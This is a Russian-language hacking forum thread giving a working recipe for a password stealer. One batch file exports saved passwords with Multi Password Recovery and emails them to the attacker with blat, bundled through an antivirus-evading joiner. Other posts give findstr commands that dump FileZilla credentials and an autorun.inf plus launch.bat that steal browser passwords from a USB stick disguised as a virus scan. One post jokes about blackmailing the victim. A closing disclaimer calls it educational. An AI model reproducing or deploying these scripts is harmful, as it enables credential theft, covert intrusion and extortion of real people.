ВАЖНО Делаем простенький стилер сами


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 164
Репутация
8 292
Давайте творчески подойдём к процессу и попробуем сделать из легальной программы, например Multi Password Recovery (MPR) программу для кражи всех паролей с компа (Стилер). Dmeh-Smeh-Smeh!!!

Вы сейчас скажите, ой-ай, чо херню несёшь, а херню-ли, рассказываю как сделать:

1) Первое что нам нужно это сам MPR. качаем по ссылке
установим MPR в отдельную папку. установили?

2)Удаляем установку- должно остаться 6 файлов, качаем blat:

Blat это маленькая open source консольная програмулька под Windows, которая позволяет отправлять e-Mail по SMTP протоколу из командной строки.

3)Архив распаковываем в ту же папку с MPR:

Создаем файл 1.bat открываем с помощью Блокнота и вводим содержимое:
Код:
@echo off
:start
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)
:end
goto :start
:send
blat.exe -install -server smtp.yandex.ru -port 587 -f твой логин@yandex.ru -u логин -pw пароль
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F

Изменяем данные на свои.

4)Сохраняем качаем программу

Это преобразование батника в exe с упаковкой нужных файлов, короче на подобие Джойнера, к сожалению она палится практически всеми АВ, ищем непалевный Джойнер на хак. сайтах !sm3888

Открываем её . в batch file вводим файл 1.bat .

В дереве visibility Ставим галку на второй чексбокс.

5)Заходим на вкладку include нажимаем на кнопку add и выбераем файлы

Код:
HookLib.dll
blat.lib
blat.exe
blat.dll
MPR.exe

И нажимаем Compile. Открываем файл и смотрим почту.


:utenok: Dmeh-Smeh-Smeh!!! Dmeh-Smeh-Smeh!!! Dmeh-Smeh-Smeh!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 164
Репутация
8 292
Один только MPR палится на вирустотале 21 антивирусником)
Может ещё что есть ?

Важно, чтобы программа поддерживала команды через батник:
Код:
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf

mpr.exe /export - делает экспорт паролей;
ren *.mpf pass.mpf - переименовывает в pass.mpf

blat.exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf - Строчка отправляет нам пароли pass.mpf !
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 164
Репутация
8 292
Кстати такой функционал не проблема реализовать обычным батником без всякого MPR, вот например гугл-хром, хранит пароли в C:\Users\SomeUser\AppData\Local\Google\Chrome\User Data\Default\Login Data

Тырити файл Login Data батником и всё, файлзилла хранит здесь:C:\Users\Ваше имя\AppData\Roaming\FileZilla\recentservers.xml

Всё разумеется не зашифрованно, короче, не храните пароли в браузерах и файлзилла !ohmy88
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 164
Репутация
8 292
Для теста своей защиты, в блокноте введите следующий код, и сохраните с расширением bat:
Код:
findstr /L “Pass User Host” %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml
cmd.exe

Данный код вытаскивает пароли из файлзилла, если есть нормальная защита, то должны получить запрет на доступ к папке Users, вот так:

2.png
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 164
Репутация
8 292
Блин очередное головотяпство, во первых в файлзилла пароли могут-быть и здесь:sitemanager.xml

А во вторых не важная какая у вас защита пробить можно вводя без кавычик:“Pass User Host”.

Пример, вводим такой код:
Код:
	findstr /L Pass %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml
	cmd.exe

Получаем пароль, никто даже не пискнул, ну OA конечно среагировал, задал алерт, ну и пох.:

Безымянный.png



Далее сохранаем эти пароли в txt и пересылаем на почту, в целом если у жертвы нет проактивки, или ламер может и сработать, существует ещё вероятность, что жертва случайно нажмёт на "Рсзрешить" !Отдыхай!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Комодовская проактивка лишь подробно описала,какие действия хочет выполнить батник,но если не всматриваться в его алерты,то прокатит.Правда паролей у меня нет.
Снимок.PNG
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 164
Репутация
8 292
Комодовская проактивка лишь подробно описала,какие действия хочет выполнить батник,но если не всматриваться в его алерты,то прокатит.Правда паролей у меня нет.
А вот теперь бонус, как стырить все пароли на флешку:

Идея вот в чём, приходите к красивой блондинке якобы проверить комп на вирусы, далее вставляет флешку с кашмарский антивирус, на флешке разумеется будет подготовленный софт, какой смотри ниже, короче когда флешка будет подключена, запуститься стиллер вместе со сканером кашмарского (Он запуститься для отвода глаз) и всё, все пароли у нас, потом заходим на почту блондинки и читаем её любовную переписку, а потом можно её шантажировать, если она откажется вас ещё пригласить...

Это типа способ знакомства такой, именно поэтому меня никто и не приглашает чинить комп, особенно блондинки, видно боятся, репутация понимаете...Dmeh-Smeh-Smeh!!! sm3888

Итак забыл самое главное сказать, как-же это всё сделать, а очень просто:

1. Создаем на флэшке две папки:
флэшка:\prog\
флэшка:\prog\log\

2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe

3. В корне флешки создаем autorun.inf со следующим содержанием:
Код:
[autorun]
open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Проверить комп на вирусы

Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.

4. Создаем батник launch.bat:
Код:
echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/OperaPassView.exe /stext prog/log/%computername%_Opera.txt
If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe

Рассмотрим команды батника поподробнее:

echo off – запрет на вывод в окно CMD результатов выполнения

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt

Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.

start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского

Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.

Весь софт во вложении, пароль:111

И ещё:

Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!
 

Вложения

  • Антивирус.zip
    1.2 МБ · Просмотры: 114

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Это типа способ знакомства такой, именно поэтому меня никто и не приглашает чинить комп, особенно блондинки, видно боятся, репутация понимаете..
Удобно.Хотя мне чаще к/т приносят домой и у меня есть время посмотреть всё что хочешь (но это совершенно не интересно,так как нет азарта).Сделаю такую флешечку ради эксперимента.Вот на HPC продают ,но с большим функционалом (правда есть и бесплатная версия).
 

Smouk

Просветленный
Просветленный
Регистрация
03.11.2013
Сообщения
440
Репутация
2 113
А вот теперь бонус, как стырить все пароли на флешку:
Этот способ актуален сейчас?) Я щас попробовал на своей системе запустить,ничего не стырил) От хрома только ссылку взял,для мозилы лог файл вобще не создает.
PasswordFox.exe - ничего не показывает. Пусто там(
 
Верх Низ